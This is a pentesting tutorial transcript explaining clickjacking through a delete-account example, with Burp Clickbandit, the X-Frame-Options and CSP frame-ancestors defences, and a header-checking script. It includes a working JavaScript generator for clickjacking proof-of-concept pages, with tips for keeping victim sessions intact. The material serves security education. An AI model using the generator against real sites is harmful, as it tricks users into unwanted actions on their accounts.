17-04-2019 / From 0 to pentesting hero

Clickjacking

How to convince the user to delete his account on the website without his consent?

My name is Kacper Szurek and in today's episode of "from 0 to pentesting hero" we'll talk about the Clickjacking attack.

Delete account

To comply with current law, most websites must offer a way for the user to remove their account.

In today's video, we'll use an example that simulates this operation.

We have a form with a text box holding a random value that the server generated when it built the form.

After the Delete account button is pressed, the server validates this value.

If the value matches the previously generated key, the account is deleted.

Otherwise, we get an error message.

Delete account form

Thanks to this, an outsider cannot prepare a phishing e-mail with a valid account-removal request and then make us click it: he does not know the correct token value.

In this way you can protect yourself against CSRF attacks, in which the user unknowingly sends a request prepared by someone with hostile intentions.

However, today we are talking about another method of attack: Clickjacking.

HTML allows external sites to be embedded inside our own site.

This can be done using the iframe tag.

IFRAME tag

In the src attribute we provide the address, and that's it.

Our website now displays external content.

We can freely change the size of the embedded frame and its position relative to our site.

We can also make it invisible to the user. And the combination of these elements is what we are going to use.

It's best to demonstrate it by example. For this purpose, I'll use the Clickbandit script from the Burp Suite tool.

Burp Clickbandit

From the application menu, I select the proper option and copy the content of the script.

Now, on the page that I want to attack, I open the development console and paste the contents of the clipboard.

In this way, I launched a tool that helps in carrying out Clickjacking attacks.

Then I click Start. Now I can select the places to be clicked by an unaware victim.

In our case, this is the Delete account button. There can be many places like this - for our purpose we only need one.

At the end I click the Finish button.

Create clickjacking attack

As you can see, the script now has a red button with the word Click.

It is positioned precisely so that it lies directly on top of the Delete account button.

What is going on? Let's make the frame fully transparent and save the generated code.

Clickjacking attack in practice

We see a white page with a single red button encouraging you to click.

There is no sign of the external service, but the fact that you cannot see it does not mean that it is not present on the page.

We can prove this by looking at the developer tools: the external page has been loaded by Chrome.

Chrome devtool console

Let's see what happens when you press the button.

We received a message that we were attacked.

In addition, a correct form has been sent to the server with a valid token, which will cause our account to be deleted.

If we turn off the transparency, we can see how the attack works in practice.

Attack in demo mode

On the page, we displayed the content of an external site using the iframe tag.

With a little CSS we made the frame's content invisible to the user.

In addition, we drew a colored rectangle underneath, exactly where the button sits inside the frame.

Therefore, the user thinks that he is clicking the rectangle on our website; because of the CSS he cannot see the button on the external page.

In reality, he clicks the button located inside the iframe.

The success of this attack depends on our creativity.
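The layout described above, written out as an added example (this is not the page's own code and not what Clickbandit emits verbatim): a small generator that produces a proof-of-concept page in which a visible decoy button sits underneath a fully transparent iframe of the target. The target URL, the button coordinates and the frame size are placeholders you would replace with values measured on the real page.

```javascript
// Added example: build a clickjacking proof-of-concept page.
// The target URL and the button coordinates are assumptions for illustration;
// measure the real button's position inside the framed page before use.

/** Escape a string for safe use inside an HTML attribute. */
function escAttr(s) {
  return s.replace(/[&<>"]/g, (c) => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" })[c]);
}

/**
 * @param {object} opts
 * @param {string} opts.targetUrl  page to frame (must not send X-Frame-Options / frame-ancestors)
 * @param {number} opts.x  left edge of the real button, in pixels inside the frame
 * @param {number} opts.y  top edge of the real button
 * @param {number} opts.w  width of the real button
 * @param {number} opts.h  height of the real button
 * @param {number} [opts.opacity=0]  0 = real attack (frame invisible); e.g. 0.5 = demo mode
 * @returns {string} a complete HTML document
 */
function buildClickjackPoc({ targetUrl, x, y, w, h, opacity = 0 }) {
  if (!/^https?:\/\//i.test(targetUrl)) throw new Error("targetUrl must be an absolute http(s) URL");
  if (!(opacity >= 0 && opacity <= 1)) throw new Error("opacity must be between 0 and 1");
  for (const v of [x, y, w, h]) {
    if (!Number.isFinite(v) || v < 0) throw new Error("coordinates must be non-negative numbers");
  }
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Quick survey</title>
<style>
  body { margin: 0; }
  /* The decoy is what the victim sees. It sits UNDER the frame (lower z-index),
     drawn at the exact spot where the real button lies inside the frame. */
  #decoy { position: absolute; left: ${x}px; top: ${y}px; width: ${w}px; height: ${h}px;
           background: #d00; color: #fff; font: bold 16px sans-serif;
           display: flex; align-items: center; justify-content: center; z-index: 1; }
  /* The framed target sits ON TOP and is transparent, so the click lands on it. */
  #target { position: absolute; left: 0; top: 0; width: 1200px; height: 900px;
            border: 0; opacity: ${opacity}; z-index: 2; }
</style></head>
<body>
<div id="decoy">Click</div>
<iframe id="target" src="${escAttr(targetUrl)}"></iframe>
</body></html>`;
}

// Usage: generate the page for a hypothetical target and save it as poc.html.
const demoHtml = buildClickjackPoc({
  targetUrl: "https://example.test/delete-account", // placeholder target
  x: 100, y: 200, w: 140, h: 40,                    // placeholder button geometry
  opacity: 0,                                       // set to 0.5 to see the frame while testing
});
```

Two practical caveats: do not add a `sandbox` attribute to the iframe without `allow-same-origin`, because the framed page would then lose the victim's session cookies and the form would no longer be submitted as the logged-in user; and if the target marks its session cookie `SameSite=Lax` or `Strict`, the browser will not send that cookie into a cross-site iframe at all, which defeats this attack even when framing is permitted.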

We have to convince the user to click the button. There are many ways - for example, creating a fake survey.

Information about the attack

But why didn't the CSRF protection work? How did the attacker know the value of the random token?

The answer is simple: he did not need to know it. We did not forge the form; the real form, served by the website to the logged-in user with its valid token, was loaded inside the frame, and the victim's own click submitted it.

All of this thanks to the iframe tag.

How to protect yourself against this attack?

It's enough to add a special response header to our site:

header("X-Frame-Options: DENY");

When the browser sees this header, it refuses to display our page inside an iframe. DENY forbids framing by anyone; if the site legitimately frames its own pages, SAMEORIGIN allows framing only from the same origin. The standardized successor is the Content-Security-Policy directive frame-ancestors, which takes precedence over X-Frame-Options when both are present.

When we try to perform the attack again, the browser console now shows that our site was not displayed because of the X-Frame-Options header.

Error information
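When testing a site for this issue it helps to evaluate the headers the way a browser would. The following added example (not part of the original page) models the documented rules for X-Frame-Options and CSP frame-ancestors: frame-ancestors wins when present, DENY blocks everyone, SAMEORIGIN allows only the same origin, and an invalid or obsolete X-Frame-Options value is treated as absent, as Chrome does. The header sets at the bottom are constructed samples; the source-expression matching is deliberately simplified.

```javascript
// Added example: would a browser let `framerOrigin` embed a page that answered
// with `headers`? Models X-Frame-Options and CSP frame-ancestors (simplified).

/** Match one frame-ancestors source expression against the framing origin. */
function matchSource(src, pageOrigin, framerOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return framerOrigin === pageOrigin;
  if (s === "*") return true;
  const f = new URL(framerOrigin);
  // scheme-source such as "https:"
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return f.protocol === s;
  // host-source: [scheme://]host[:port]; host may start with "*." (subdomains only)
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?/);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme && scheme + ":" !== f.protocol) return false;
  const fPort = f.port || (f.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && port !== fPort) return false;
  if (host.startsWith("*.")) return f.hostname.endsWith(host.slice(1));
  return f.hostname === host;
}

/**
 * @param {Object<string,string>} headers  response headers (names in any case)
 * @param {string} pageOrigin    origin of the framed page, e.g. "https://bank.example"
 * @param {string} framerOrigin  origin of the page that holds the <iframe>
 * @returns {{allowed: boolean, reason: string}}
 */
function canBeFramed(headers, pageOrigin, framerOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // CSP frame-ancestors takes precedence over X-Frame-Options when present.
  const csp = h["content-security-policy"];
  if (csp) {
    const directive = csp.split(";").map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1); // empty list means 'none'
      const allowed = sources.some((src) => matchSource(src, pageOrigin, framerOrigin));
      return { allowed, reason: `CSP frame-ancestors ${sources.join(" ") || "(empty)"}` };
    }
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return { allowed: false, reason: "X-Frame-Options: DENY" };
  if (xfo === "SAMEORIGIN") {
    return { allowed: framerOrigin === pageOrigin, reason: "X-Frame-Options: SAMEORIGIN" };
  }
  if (xfo) {
    // e.g. ALLOW-FROM or a typo: Chrome logs a warning and ignores the header.
    return { allowed: true, reason: `X-Frame-Options "${xfo}" is invalid/obsolete and ignored` };
  }
  return { allowed: true, reason: "no framing restriction" };
}

// Constructed sample responses, checked from an attacker's origin.
const PAGE = "https://bank.example";
const ATTACKER = "https://evil.example";
const samples = {
  unprotected: {},
  deny: { "X-Frame-Options": "DENY" },          // the header the article adds
  sameorigin: { "x-frame-options": "SAMEORIGIN" },
  cspNone: { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" },
  cspPartner: { "Content-Security-Policy": "frame-ancestors 'self' https://*.partner.example" },
  cspOverridesXfo: { "X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *" },
};
const verdicts = Object.fromEntries(
  Object.entries(samples).map(([name, hdrs]) => [name, canBeFramed(hdrs, PAGE, ATTACKER).allowed])
);
```

`verdicts` reports only `unprotected` and `cspOverridesXfo` as frameable by the attacker's origin; the last case is the one worth remembering during a review, because a permissive frame-ancestors silently cancels a DENY sitting next to it.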

In the past, such attacks were used to steal likes on Facebook and other sites. The attackers embedded a Facebook page on their own website and positioned buttons so that the user would unknowingly like a fan page.

Facebook

And that's all in today's episode. As you can see, innocent clicks on a website can have significant consequences.